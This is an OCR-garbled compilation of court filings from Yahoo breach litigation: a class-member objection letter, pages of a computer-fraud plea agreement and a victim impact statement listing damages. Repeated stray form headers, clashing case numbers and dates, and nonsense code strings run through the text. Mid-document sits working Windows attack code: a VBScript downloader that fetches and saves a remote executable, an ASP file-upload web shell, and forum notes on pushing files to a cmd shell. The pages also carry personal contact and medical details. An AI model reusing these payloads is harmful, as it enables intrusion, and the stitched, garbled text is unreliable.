(Please note, though, that the undersigned did not originally have hundreds of thousands of email addresses and/or username or URL information sets per se; yet the hacking activities altered and/or otherwise resulted in hundreds of thousands of combinations either in practice and/or as links, ghosts, etc.)

4. Additional details are shown below and in the court files and/or cross-references thereto.

5. As shown in the aforementioned court-submitted FBI File 3-20CR0506-X and/or cross-references thereto, please see the following (it is important to note that certain quoted sections below come from the hackers' files):

> Entry 91423, concerning Facebook-URL problems, including, but not limited to: "...all the Facebook/Apple server skimming - via URL masking and erasing and all those other tricks from Alfred – that you did on Orr's Facebook account and his Firstenergy contacts and so forth for years, from 2010 to today..."
>
> - Entries 91426 and 91427, concerning Facebook-hacker-altered URL- and/or other identifier codes/attributes related to Orr's Facebook account(s): "...https://www.faceboo k.com/edward.orr xxxx et al via SFCY5293 et al and

2073984700

OC  PL Document ID (RC-2)

August 1981 / 07898.
Medical Records Release Authorization
1895   A   (KR)
1897   X   (JC)
1899   X   (JC)
1901   A   (JC)
1903   X   (JC)

CHRON (REVIEW 4 OF 4)
Password required to print: ..........

Case 5:16-md-02752-LHK  Document 438-3  Filed 03/13/20  Page 2 of 1032

COR0000644
31033
CORC000644

Mr. Scott Fenwick
Heffler Claims Group
February 28, 2020
Page 1 of 44

1
2
3             **EDWARD W. ORR**
4             **DARLENE D. ORR**
            122 Ridge Road
5             Terryville, CT 06786
6      *Sent vio certified mail 7015 0640 0003 5606 4735*
7          *and with Notarized Signatures*
8 February 28, 2020
9
10 Mr. Scott Fenwick[1]
     Heffler Claims Group
11 1515 Market Street, Suite 1700
     Philadelphia, PA 19102
12
13 SUBJECT:      **OBJECTION AND COMMENTARY OF**
                   **EDWARD AND DARLENE ORR REGARDING**
14                    **THE PROPOSED SETTLEMENT (In "In re:**
15                    **Yahoo! Inc. Customer Data Breach Security**
                   **Litigation, Case Number 16-md-02752-LHK")**
16
17 [1] The Honorable Judge Koh has recognized and referenced previous
18 submissions of the undersigned Objectors in multiple Court documents,
     including on page 27 of ECF-351 (PLEASE SEE ATTACHED EXHIBIT 1),
19 and elsewhere in other documents:
20
21      **[JUDGE KOH SPEAKING] "DID YOU**
     **[PLAINTIFFS' COUNSEL] HAVE ANY**
22      **RESPONSE TO THE OBJECTION OF**
23      **DARLENE OR EDWARD ORR..."**
24
     **ACCORDINGLY, THE COURT HAS RECOGNIZED THAT**
25      **WE ARE SETTLEMENT CLASS MEMBERS. OUR**
     **OBJECTION IS BEING SENT TO YOU VIA CERTIFIED**
26      **MAIL, WITH NOTARIZED SIGNATURES. IN ADDITION,**
     **PLAINTIFFS' COUNSEL HAS STATED, ON THE**
27      **RECORD, "WE ARE PREPARED TO ADDRESS THOSE**
28      **[OBJECTIONS]..." [PAGE 27 OF ECF-351].**

Page 1 of 44



2073984700

DC  PL Document ID (RC-2)

August 1981 / 07096.
Medical Records Release Authorization
1096    A    (NR)
1903    X    (JC)
1999    X    (JC)
2201    X    (JC)
2201    A    (JC)

CHRON (REVIEW 4 OF 4)
Password required to print. ...........

eanddorr57@yahoo.com and/or additional permutations thereof.)

Please note that the aforementioned URL combinations and/or permutations number in excess of 147,382, and were as a result of the hacking; the email-associated addresses and/or codes also number in excess of 147,382.

See also the therewith-related and previously mentioned FBI[1] Correspondence (in court Exhibits "S," "T," "U," et al) to the Orr family regarding Facebook / FirstEnergy and ADT damages; etc.

* * * * * * * *

See also FBI Agent Ryan Weydeck's cross-reference email (court Exhibit "U) to the Orr Family regarding the sentencing of FirstEnergy (SEE ALSO FACEBOOK / FIRSTENERGY LINKS AND FBI CASE FILES HEREIN) affiliate Telesforo Aviles et al / see also Baratov, and others; see hacking, plus theft of mail; tampering with mail; copious personal and property damages; etc. SEE ALSO FACEBOOK-TRACKING ACTIVITIES AND INTERACTION WITH FIRSTENERGY-AFFILIATED INDIVIDUALS SUCH AS THOMAS MACRI, HAO GU, ET AL, OVER A MULTI-YEAR TIME PERIOD.

Focus Center

[1] See also Facebook / FirstEnergy links, including links to C. Jones, et al, who have also been the subject of multiple criminal investigations and/or related.

Focus Center

Focus Center

2073984700

DC FL Document ID (bd-2)

CHRON (REVIEW 4 OF 4)
Password required to print. ............

Case 5:16-md-02752-LHK Document 438-3 Filed 03/13/20 Page 9 of 1032

Mr. Scott Fenwick
Heffler Claims Group
February 28, 2020
Page 8 of 44

1
2
3
4 **WE ARE ALSO CLASS MEMBERS**
5
6 **BECAUSE UNITED STATES ATTORNEYS**
7
8 **OFFICE MATERIALS WERE SENT TO US,**
9
10 **AS WE WERE IDENTIFIED AS VICTIMS**
11
12 **OF NUMEROUS YAHOO HACKINGS**
13 **PERPETRATED BY "KARIM BARATOV,"** a
14
15 Russian hacker living in Canada at the time), in THE FEDERAL
16 CASE, *UNITED STATES VERSUS KARIM BARATOV: CR 17-*
17 *00103 VC (NDCA).* This is a case in which numerous Yahoo
18 accounts were proven hacked. Such accounts included multiple of
19 our Yahoo accounts, including, but not limited to, the following:
20 eorr@yahoo.com, eorr2@yahoo.com, eanddorr2@yahoo.com,
21 eanddorr57@yahoo.com, et al. BECAUSE OF THE UNITED
22 STATES ATTORNEYS CRIMINAL INVESTIGATIONS OF
23 KARIM BARATOV (WHO, ON THE BASIS OF OUR
24 EVIDENCE, AND THE EVIDENCE OF OTHER DAMAGED
25
26
27
28

Page 8 of 44

2073984700

OC 7L Document ID (RC-3)

August 1981 / 07896.
Medical Records Release Authorization
1993    A    INRI
1997    X    IJCI
:1939   X    IJCI
2201    X    IJCI
3393    X    IJCI

CHRON (REVIEW 4 OF 4)
Password required to print:  ··········

Case 5:16-md-02752-LHK   Document 438-3   Filed 03/13/20   Page 44 of 1032

Mr. Scott Fenwick
Heffler Claims Group
February 28, 2020
Page 43 of 44

Sincerely,

Edward W. Orr          Darlene D. Orr

122 Ridge Road
Case 5:16-md-02752-LHK   Document 438-3   Filed 03/13/20   Page 2 of 1032
Wolcottville, CT 06786
Telephone: 203-565-5670          31033          COR0000644
Heffler Claims Group
February 28 sandoorr2@gmail.com
Page 1 of 44

CRS/DDO:fw92743584URD W. ORR
DARLENE D. ORR
Enc.: As described herein Ridge Road
Wolcottville, CT 06786

State of Connecticut, certified mail 7013 0600 0003 5606 4733
and with Notarized Signatures

County of Hartford ss. (Town/City) Southington

On this the 29th day of Feb, 20 20, before me, Robert DeFeo, the under-
Mr. Scott Fenwick
signed officer, personally appeared Edward W. Orr and
1515 Market Street, Suite 1700
Philadelphia, PA 19102 Darlene D. Orr
known to me (or satisfactorily proven) to be the persons whose names are subscribed
to the within instrument and acknowledged that he executed the same for the
purposes therein contained.

In witness whereof I hereunto set my hand.

Notary Public

Date Commission Expires: April 30, 2014

My Commission Expires Apr 30, 2014

cc:

Page 43 of 44

2073984700

DC FL Document ID (RC-2)

August 1981 / 07884.
Medical Records Release Authorization
1881    X    (RM)
1881    X    (JC)
1888    X    (JC)
2201    X    (JC)
2201    X    (JC)

CHRON  (REVIEW 4 OF 4)
Password required to print: ***********

Focus Center

Focus Center

Focus Center

2073984700

DC  FL Document ID (AC-1)

Augvat 1981 / 07096+
Medical Records Release Authorization
1195    X    (NM)
1197    X    LJC1
1199    X    LJC1
1201    X    LJC1
1203    X    LJC1

CHRON  (REVIEW  4  OF  4)
Password required to print:

Edward W. Orr    Darlene D. Orr

122 Ridge Road
Case 5:12-md-02314-EJD  Document 438-3  Filed 03/13/20  Page 2 of 1033
Terryville, CT 06786

Telephone: 203-565-5670                    COR0000644
                                     31033
Email: sandiorr2@gmail.com
Page 1 of 44

CRS/DDO:fw927436849 RD W. ORR
                    DARLENE D. ORR
Enc.: As described 122 Ridge Road
                   Terryville, CT 06786

State of Connecticut certified mail 7015 0640 0003 3606 4713
                      and with Notarized Signatures

County of Hartford ss. (Town/City) Southington

On this the 29 day of Feb, 20 20, before me, Rosanna DeFeo the under-
M: Scot Fagwork
signed officer, personally appeared  Edward W. Orr  and
1515 Market Street, Syne 1200 Darlene D. Orr
Philadelphia, PA 19102
known to me (or satisfactorily proven) to be the persons whose names are subscribed
to the within instrument and acknowledged that they executed the same for the
purposes therein contained. PROPOSED SETTLEMENT (In re:
Yahoo! Inc. Customer Data Breach Security
Litigation, Case Number 16-md-02752-LHK")
In witness whereof I hereunto set my hand.

Notary Public

Date Commission Expires: April 30, 2024

[PLAINTIFFS' COUNSEL]  "DID  YOU  HAVE  ANY
cc: RESPONSE

Page 43 of 44

2073984700

OC PL Document ID IAC-3:

August 1985 / 07894-
Medical Records Release Authorization
1985    A    (NM)
1997    A    LJCI
1985    A    LJCI
7201    4A   IJCI
3703    A    IJCI

## CHRON (REVIEW 4 OF 4)
Password required to print: ...........

Case 0:20-cv-60971-AHS   Document 53-3   Entered on FLSD Docket 10/27/2020   Page 7 of 8
Case 3:20-cr-00506-X   Document 4   Filed 10/19/20   Page 6 of 7   PageID 11

reduction in the defendant's sentence (e.g., based on a change in sentencing guidelines or
statutory law). The defendant, however, reserves the rights (a) to bring a direct appeal of
(i) a sentence exceeding the statutory maximum punishment, or (ii) an arithmetic error at
sentencing; (b) to challenge the voluntariness of the defendant's plea of guilty or this
waiver, and (c) to bring a claim of ineffective assistance of counsel.

13.     Representation of counsel: The defendant has thoroughly reviewed all
legal and factual aspects of this case with the defendant's attorney and is fully satisfied
with that attorney's legal representation. The defendant has received from the
defendant's attorney explanations satisfactory to the defendant concerning each
paragraph of this plea agreement, each of the defendant's rights affected by this
agreement, and the alternatives available to the defendant other than entering into this
agreement. Because the defendant concedes that the defendant is guilty, and after
conferring with the defendant's attorney, the defendant has concluded that it is in the
defendant's best interest to enter into this plea agreement and all its terms, rather than to
proceed to trial in this case.

14.     Entirety of agreement: This document is a complete statement of the
parties' agreement and may not be modified unless the modification is in writing and
signed by all parties. This agreement supersedes any and all other promises,
representations, understandings, and agreements that are or were made between the
parties at any time before the guilty plea is entered in court. No promises or
representations have been made by the United States except as set forth in writing in this
plea agreement.

Plea Agreement—Page 6

2073984700

DC  7L Document 19 (AC-3)

August 1981 / 07086»
Medical Records Release Authorization
1895    X    INNI
1987    X    IJCI
1899    X    IJCI
3301    •A   IJCI
3701    X    IJCI

### CHRON (REVIEW 4 OF 4)
Password required to print: ''''''''''

```
cscript    up.vbs    http://123.45.67.89/up.asp    nc.exe    mm.exe

2.
start                                its:http://www.sometips.com/soft/ps.exe
cd  "C:\Documents and Settings\Default User\Local Settings\Temporary
Internet                                          Files\Content.IE5"
dir                        /s                        ps[1].exe
copy            XX000XXX\ps[1].exe              c:\path\ps.exe
del                                          XX000XXX\ps[1].exe

3.
@echo with wscript:if .arguments.count^<2 then .quit:end if > dl.vbs
@echo    '        set            aso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp")        >>              dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then
.echo          "Error:"+web.status:.quit        >>              dl.vbs
@echo  aso.type=1:aso.open:aso.write  web.responsebody:aso.savetofile
.arguments(1),2:end            with          >>              dl.vbs

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe E-
9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4a
https://www.facebook.com/edward.orr xxxx et al
via SFCY5293 et al and
eandorr@cox.net et al and
e.orr@cox.net et al and
eanddorr2@gmail.com et al and
eanddorr@comcast.net et al and
E-9GOTO8aTAvilesGOTOTMacri63427SFCY23aURLSETTOdelta4b
```

about all ways to upload files to cmd shell , since i started with
tftp and net share , then i increased my knowledge to the ftp method ,
then i made that vbs thing , and i knew after that the mshta thing ,
and i did other way with echoing , but its still beta thing (has some
problems , but u can echo anytext u want including signs and
all;GOTOP&5294 @echo ^<%with
server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

in your client,save as up.vbs:

```
Mem/dwnload473Kb/s:Phone  server  co-source  Digital  Messaging  System
KX2621nkbGOTOMem/dwnload473Kb/s:Phone    server    co-source    Digital
```

2073984700

DC PL Document ID (BC-3)

August 1991 / 07096.
Medical Records Release Authorization
1895      A      (NR)
1897      A      (JC)
1939      A      (JC)
2201      A      (JC)
3591      A      (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ***********

Case 0:20-cv-60971-AHS Document 53-3 Entered on FLSD Docket 10/27/2020 Page 2 of 8
Case 3:20-cr-00506-X Document 4 Filed 10/19/20 Page 1 of 7 PageID 6

# ORIGINAL

CLERK U.S. DISTRICT COURT
NORTHERN DIST OF TX
FILED

2020 OCT 19 AM 11: 35

IN THE UNITED STATES DISTRICT COURT
FOR THE NORTHERN DISTRICT OF TEXAS
DALLAS DIVISION

DEPUTY CLERK

UNITED STATES OF AMERICA

v.

TELESFORO AVILES

NO.

## 3-20CR0506-X

## PLEA AGREEMENT

Telesforo Aviles, the defendant, Tom Pappas, the defendant's attorney, and the

United States of America (the government) agree as follows:

1.    Rights of the defendant: The defendant understands that the defendant
has the rights:

   a.    to plead not guilty;

   b.    to have a trial by jury;

   c.    to have the defendant's guilt proven beyond a reasonable doubt;

   d.    to confront and cross-examine witnesses and to call witnesses in the
         defendant's defense; and

   e.    against compelled self-incrimination.

2.    Waiver of rights and plea of guilty: The defendant waives these rights

and pleads guilty to the offense alleged in Count One of the Information, charging a

violation of 18 U.S.C. § 1030(a)(2)(C) and (c)(2)(B)(ii), that is, Computer Fraud. The

defendant understands the nature and elements of the crime to which the defendant is

2073984700

OC PL Document 10 (AC-3)

Acqust 1101 / 07096.
Medical Records Release Authorization
1995      X      1N01
1107      X      LJC1
1099      X      LJC1
3201    + A      LJC1
7103      A      LJC1

CHRON (REVIEW 4 OF 4)
Password required to print: ...........

Case 0:20-cv-60971-AHS   Document 53-3   Entered on FLSD Docket 10/27/2020   Page 8 of 8
Case 3:20-cr-00506-X   Document 4   Filed 10/19/20   Page 7 of 7   PageID 12

AGREED TO AND SIGNED this 19 day of October , 2020 .

ERIN NEALY COX
UNITED STATES ATTORNEY

Sid P. Mody
Assistant United States Attorney
Texas State Bar No. 24072791
1100 Commerce St. Suite 300
Dallas, Texas 75242
Tel: 214-659-8600
siddharth.mody@usdoj.gov

Errin Martin
Criminal Section Chief

I have read or had read to me this plea agreement and have carefully reviewed every part of it with my attorney. I fully understand it and voluntarily agree to it.

Telesforo Aviles                    Date    10/16/20
Defendant

I am the defendant's attorney. I have carefully reviewed every part of this plea agreement with the defendant. To my knowledge and belief, my client's decision to enter into this plea agreement is an informed and voluntary one.

Tom Pappas                          Date    6/16/20
Attorney for Defendant

Plea Agreement—Page 7



2073984700

DC  PL Document ID (32-3)

August 1981 / 07894-
Medical Records Release Authorization
1893    X    IMM)
1997    X    1JC1
1531    X    1JC1
2203    X    1JC1
2701    X    1JC1

CHRON (REVIEW 4 OF 4)
Password required to print: ............

**EDWARD W. ORR**
122 Ridge Road
Terryville, CT 06786

January 19, 2018

United States Attorneys Office
Attn: Victim Witness Unit
Northern District of California
450 Golden Gate Ave.
Box 36055
San Francisco, CA 94102

RE:  I.  VICTIM IMPACT STATEMENT (ATTACHED)

II. THE EMAIL-COMMUNICATED LETTER[1] OF 1-18-18 FROM
THE VICTIM WITNESS UNIT, REGARDING THE VICTIM
IMPACT STATEMENT DUE 1-26-18 (THE CONTENT OF
SAID LETTER WAS FORWARDED TO ME VIA COUNSEL[2]
FOR RESPONSE TO YOU)

Dear Sir or Madam:

Attached is my Victim Impact Statement.

Thank you very much for your ongoing efforts, and for prosecuting Mr.
Baratov et al.

---

[1] And/or related communications, et al

[2] In said letter it your mailing address was provided as a contact option. Accordingly, given the volume of
materials, including hard copy, computer media, flash drives, etc., I am responding to you.

2073984700

DC   FL Document ID (DC-2)

```
August 1981 / 07896-
Medical Records Release Authorization
1895    X    INDEX
1897    X    IJCI
1899    X    IJCI
2201    X    IJCI
2701    X    IJCI
```

CHRON   (REVIEW 4 OF 4)
Password required to print: ...........

Sincerely,

*Edward W. Orr (per Darlene D. Orr)*

Edward W. Orr[3] (per Darlene D. Orr)
122 Ridge Road
Terryville, CT 06786
Telephone: 203-658-4977

Enc.:   As enumerated above.

cc:     J. Cannon (cover letter only)
        S. Winick (cover letter only)
        D. Katz (cover letter only)
        SSA File-63/EWO924538/re
        DC File/351292381033f/re

---

[3] As discussed, and as Edward Orr is severely physically handicapped, his wife (who holds full Power of Attorney) utilizes the computer (and/or accounts) on his behalf and on the family's behalf.

2

2073984700

OC  PL Document ID (ME-11

August 1981 / 87898.
Medical Records Release Authorization
1895    X    (NN)
1897    X    LJC1
1899    X    LJC1
2201    X    LJC1
2703    X    LJC1

CHRON (REVIEW 4 OF 4)
Password required to print: ***********

**Victim Impact Statement**                    **Deadline: January 26, 2018**

United States vs. Karim Baratov

Case Number: CR 17-00103 VC (NDCA)

**Name of Victim:** EDWARD W. ORR (SEE ALSO DARLENE D. ORR, HOLDING POWER OF ATTORNEY FOR HER HUSBAND, EDWARD, AS EDWARD IS PHYSICALLY DISABLED; MS. ORR, PER COUNSEL, IS ALSO INCLUDED HEREIN AS A VICTIM WITH THE SAME ADDRESS AND CONTACT INFORMATION.)

**Email Address That Was Hacked:** eanddorr2@yahoo.com eanddorr57@yahoo.com and via Yahoo: eanddorr2@omail.com darlenedorr@omail.com ADT/Yahoo/ Verizon/Comcast-related accounts and/or related; especially Yahoo- and ADT-related; other accounts and/or connections; see also attachments

Date Your Email Account was Hacked (month/year): Primarily approximately 4-14 through 12-16, with apparent Baratov-related events as far back as approximately 2-2012; see also attachments

**Country of Residence:** United States

If you are an international email account user who is located outside of the United States, please notify our office as soon as possible before any further communication. Please include your name and country of residence in your correspondence and send it to USAEO.MCAP@usdoj.gov.

Please continue these statements on an additional sheet of paper if you wish.

1. How have you and members of your family been affected by this crime?

   **PLEASE SEE ATTACHED SHEETS.**

2. As a result of this incident, have you sustained a financial loss?
   **PLEASE SEE ATTACHED SHEETS.**
   If yes, for each financial loss, please (a) list the specific amount, (b) provide a description, and (c) attach receipts or other records as verification.

   This financial loss may include an amount equal to the value of your time spent in remediating the harm of your email account being hacked. This may also include items such as counseling, medical bills, lost income and necessary child care, transportation, and other expenses related to participation in the investigation or prosecution of the offense or attendance at proceedings related to the offense.

2073984700

DC FL Document ID (SC-2)

August 1981 / 07095-
Medical Records Release Authorization
1195    A    INN)
1997    A    LJCI
1939    A    LJCI
2201    A    LJCI
3703    A    LJCI

CHRON (REVIEW 4 OF 4)
Password required to print: ···········

3. For the financial losses listed, described, and supported with documentation in Item 2 above, what (if any) portion of the above losses were covered by insurance or some other form of reimbursement? Please list any money you were paid or expect to be paid.

**PLEASE SEE ATTACHED SHEETS.**

4. Are there any comments you wish to make concerning the sentencing, restitution, or impact this crime has had on your business or personal life?

**PLEASE SEE ATTACHED SHEETS.**

If restitution is ordered by the Court, to whom should the check be made out and to what address should it be mailed?

Name: EDWARD W.ORR (PER DARLENE D. ORR)

Address of restitution recipient:    **122 RIDGE ROAD**

TERRYVILLE, CT 06786

Telephone No.: (203) 658-4977

I DECLARE UNDER PENALTY OF LAW THAT THE ABOVE INFORMATION IS TRUE AND CORRECT.

Signature: Edward W, Orr (per Darlene D. Orr)

Printed Name: EDWARD W.ORR (PER DARLENE D. ORR)

Date: **JANUARY 19, 2018**

Completed forms should be sent to USAEO.MCAP@usdoj.gov on or before **January 26, 2018.**

2073984700

OC  PL Document 19 (12-2)

August 1991 / 87896-
Medical Records Release Authorization
2895    R    (MBI
1997    R    (JC)
1895    R    (JC)
2201    R    (JC)
2701    R    (JC)

CHRON (REVIEW 4 OF 4)
Password required to print: ***********

## Name of Victim:

EDWARD W. ORR (SEE ALSO DARLENE D. ORR, HOLDING POWER OF ATTORNEY FOR HER HUSBAND, EDWARD, AS EDWARD IS PHYSICALLY DISABLED; MS. ORR, PER COUNSEL, IS ALSO INCLUDED HEREIN AS A VICTIM WITH THE SAME ADDRESS AND CONTACT INFORMATION.)

## Email Address(es) hacked:

eanddorr2@yahoo.com  eanddorr576@yahoo.com and via Yahoo: eanddorr2@gmail.com  darlenedorr@gmail.com ADT/Yahoo/ Verizon/Comcast-related accounts and/or related; especially Yahoo- and ADT-related; other accounts and/or connections; see also attachments

## Date Your Email Account was hacked (month/year):

Primarily approximately 4-14 through 12-16, with apparent Baratov-related events as far back as approximately 2-2012; see also attachments

## Country:

United States

Question 1 on the Victim Impact Statement (as additional space is obviously required, the answer is shown below and on the referenced/enclosed documents, many of which have already been filed in federal and/or state court):

As described in numerous federal filings, my wife and I have thus far suffered in excess of $267,465 in financial losses, NOT COUNTING PHYSICAL, EMOTIONAL AND MENTAL DAMAGES, PAIN AND SUFFERING AND RELATED.

(PLEASE NOTE THAT THERE IS A LINE ENTRY FOR THIS SUBCATEGORY ["PHYSICAL, EMOTIONAL..."] BELOW, BUT IT IS NOT SHOWN HERE IN THE GRAND TOTAL, AS COUNSEL NOTED THAT THERE WOULD PROBABLY NOT BE ENOUGH MONEY AVAILABLE FROM THE DEFENDANT.)

PLEASE SEE THE ANSWER TO QUESTION 2 BELOW FOR ADDITIONAL DETAILS.

Question 2 on the Victim Impact Statement (as additional space is obviously required, the answer is shown below and on the referenced/enclosed documents, many of which have already been filed in federal and/or state court):

1

2073984700

OC  PL Document ID (SC-3)

August 1991 / 07094.
Medical Records Release Authorization
1093    X    1NK1
1097    X    LJC1
1109    X    LJC1
2201    X    LJC1
2701    X    LJC1

## CHRON (REVIEW 4 OF 4)
Password required to print: **********

## $267,475 of Damages (Grand Total as shown below)

The undersigned has already filed several thousand documents, in Federal Court, relating to damages from Baratov's actions.

These documents are filed in U.S. District Court, California Northern District (San Francisco), CASE #: 3:16-cv-02233-JST (Michael Edenborough et al v. ADT, LLC et al). See numerous filings, including, but not limited to, ECF 132 and all support documents, in both hard copy and/or computer formats, et al.

See also, among numerous other items, the attached letters of 12-11-14; 12-29-14; 12-23-15; 4-4-17; SSA communications sent by John L. Cannon; 1-2-15; et al.

Please note, also, that Yahoo, for instance, was informed, by the undersigned, of security problems with Baratov, et al, years before Yahoo admitted that its procedures were improper, and years before Yahoo did anything at all substantially constructive about said problems.

Yahoo also could have prevented these problems.

Many damages are still ongoing, and not all problems have been resolved. As Baratov and/or his colleagues sold and/or transferred much info, damages are reasonably expected to continue for quite some time.

In addition, various documents have been referenced and/or filed in CT Superior Court, H17B-MV17-0243468-S.

All of the aforementioned are incorporated herein in full.

Per the advice of Counsel, and as the Victim Impact Statement (VIS) announcement/letter/communication was communicated to the undersigned, a totally physically handicapped victim, only nine days before the VIS report deadline, please see both the below items and the attached/herein-incorporated, Federal-Court-already-submitted[1] receipts and records:

The estimated total loss is, THUS FAR, $267,475, as enumerated below, NOT COUNTING PHYSICAL, EMOTIONAL AND MENTAL DAMAGES, PAIN AND SUFFERING AND RELATED (PLEASE NOTE THAT THERE IS A LINE ENTRY FOR THIS SUBCATEGORY BELOW, BUT IT IS NOT SHOWN HERE IN THE GRAND TOTAL, AS COUNSEL NOTED THAT THERE WOULD PROBABLY NOT BE ENOUGH MONEY AVAILABLE FROM THE DEFENDANT):

1.    $3,800    Forensic analysis and related analyses of hacking/intrusion, etc.

---

[1] Please see U.S. District Court, California Northern District (San Francisco), CASE #: 3:16-cv-02233-JST (Michael Edenborough et al v. ADT, LLC et al). See numerous filings, including, but not limited to, ECF 132 and all support documents, in both hard copy and/or computer formats, et al.

Also, please note, per Counsel, the ongoing damages, and the physical disabilities of the claimant (totally physically disabled owing to spinal cord injuries from six fractures in the neck and lumbar regions, plus 140 additional injuries resulting from an intoxicated driver's travelling at 120 MPH and colliding with the undersigned's auto).

Such disabilities, in conjunction with the nine-day report deadline, obviously mean that the totals/subtotals below are approximate, with up to several hundred hours being required to fully tabulate the numerous damages and expenses shown in the thousands of documents.

Once again, please note that, per Counsel, et al, additional damages will be forthcoming.

2

2073984700

DC PL Document ID (AC-3)

August 1901 / 07696-
Medical Records Release Authorization
1899    A    (MM)
1907    B    LJC)
1938    A    LJC)
2201    B    LJC)
3901    E    LJC)

CHRON (REVIEW 4 OF 4)
Password required to print: ...........

II.    ADT, Guardian Security Systems, additional security systems/measures, installation/maintenance
       and/or related, attorney/legal fees, and other damages subdivided as follows:

- $3,100    Initial ADT Security and related

- $1,200    Initial Guardian Security and related

- $2,900    Monthly ADT/Guardian and related, including equipment updates,
            replacement, etc.

- $17,400   Security Barrier/Fence and related

- $1,800    Guard/Richardson and related

- $41,800   Attorney/Legal fees and expert witnesses, data gathering, etc. (Worgul,
            and related)

- $8,000    Attorney/Legal fees and expert witnesses, data gathering, etc.
            Orie/Tubbs and related

- $22,000   Computer hacking research, legal research data and related

- $26,800   Forced move from dwelling

- $37,000   Lost family income and related, as, among other things, Darlene D. Orr
            had to quit her job in order to vacate the dwelling and move, etc.

- $14,000   Consequential repairs and/or lost value in dwelling, etc. (as result of
            hacking intrusions, related damage, etc.)

- $3,100    Other

- $53,500   Time, at a minimum of 2.5 hours per day from November 6, 2014, to
            March 30, 2017, at $25 per hour for 2,140 hours

3

2073984700

DC   76   Document   ID   (NC-3)

August 1981 / 07036.
Medical Records Release Authorization
1895    X    INRI
1897    X    IJCI
1899    X    IJCI
2201    X    IJCI
2503    X    IJCI

## CHRON (REVIEW 4 OF 4)
Password required to print: ***********

- $23,850    Time, at a minimum of 1.5 hours per day from February 1, 2012, to November 6, 2014, at $25 per hour for 954 hours

- $7,225    Time, at a minimum of 1.5 hours per day from March 30, 2017, to the present, January 19, 2018, at $25 per hour for 289 hours

- $9,000,000 - $11,000,000    PHYSICAL, EMOTIONAL AND MENTAL DAMAGES, PAIN AND SUFFERING AND RELATED (PLEASE NOTE THAT ALTHOUGH THERE IS OBVIOUSLY A LINE ENTRY FOR THIS SUBCATEGORY, IT IS NOT SHOWN HERE IN THE GRAND TOTAL, AS COUNSEL NOTED THAT THERE WOULD PROBABLY NOT BE ENOUGH MONEY AVAILABLE FROM THE DEFENDANT)

Question 3 on the Victim Impact Statement (as additional space is obviously required, the answer is shown below and on the referenced/enclosed documents, many of which have already been filed in federal and/or state court):

The damages above are not reimbursable.

Question 4 on the Victim Impact Statement (as additional space is obviously required, the answer is shown below and on the referenced/enclosed documents, many of which have already been filed in federal and/or state court):

As described in communications from Dr. John L. Cannon to the Social Security Administration, the already-fragile condition of my health was essentially ruined beyond any reasonable repair.

My left side has been ruined.

Numerous other injuries and damages occurred.

The sum total of the damages is immense.

Our entire family unit was forced to move and we lost our much of our life savings.

4

2073984700

DC   PL Document ID (DC-2)

```
August 1993 / 07096.
Medical Records Release Authorization
1995    A    (RR)
1997    A    LJC1
1899    A    LJC1
2201    A    (JE1
2593    A    LJC1
```

CHRON   (REVIEW  4  OF  4)
Password required to print: ***********

The relatively brief sentence that the Defendant received is not nearly enough.

He should be required to make restitution in full, including for PHYSICAL, EMOTIONAL AND MENTAL DAMAGES, PAIN AND SUFFERING AND RELATED (PLEASE NOTE THAT THERE IS A LINE ENTRY FOR THIS SUBCATEGORY ABOVE, BUT IT WAS NOT SHOWN IN THE GRAND TOTAL, AS COUNSEL NOTED THAT THERE WOULD PROBABLY NOT BE ENOUGH MONEY AVAILABLE FROM THE DEFENDANT).

JUST BECAUSE IT IS NOT SHOWN IN THE GRAND TOTAL PER SE DOES NOT MEAN THAT THE DEFENDANT SHOULD NOT HAVE TO PAY IT.

THE DEFENDANT SHOULD BE REQUIRED TO WORK TO PAY THE ENTIRE AMOUNT TO US, OR TO OUR HEIRS SHOULD WE DIE FROM THE STRESS AND INJURIES SUFFERED.

5